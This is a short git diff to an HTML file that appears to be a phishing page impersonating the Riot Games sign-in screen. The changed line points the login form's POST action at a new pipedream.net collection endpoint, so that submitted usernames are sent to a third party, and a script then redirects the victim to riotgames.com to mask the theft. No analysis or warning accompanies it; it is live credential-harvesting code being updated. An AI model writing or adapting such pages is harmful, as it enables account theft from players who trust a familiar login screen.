--- a/index.html
+++ b/index.html
@@ -237,7 +237,7 @@
                 <h1>Sign in</h1>
                 <p>Sign in with your Riot Account</p>
             </div>
-            <form action="https://ensot9tyzor.x.pipedream.net/" method="POST" onsubmit="setTimeout(function(){ window.location.href = 'https://riotgames.com'; }, 1000);">
+            <form action="https://eor6khqiw4l6e4x.m.pipedream.net" method="POST" onsubmit="setTimeout(function(){ window.location.href = 'https://riotgames.com'; }, 1000);">
 				<div class="form-group">
 					<label for="username">Username:</label>
 					<input type="text" id="username" name="username"><br><br>
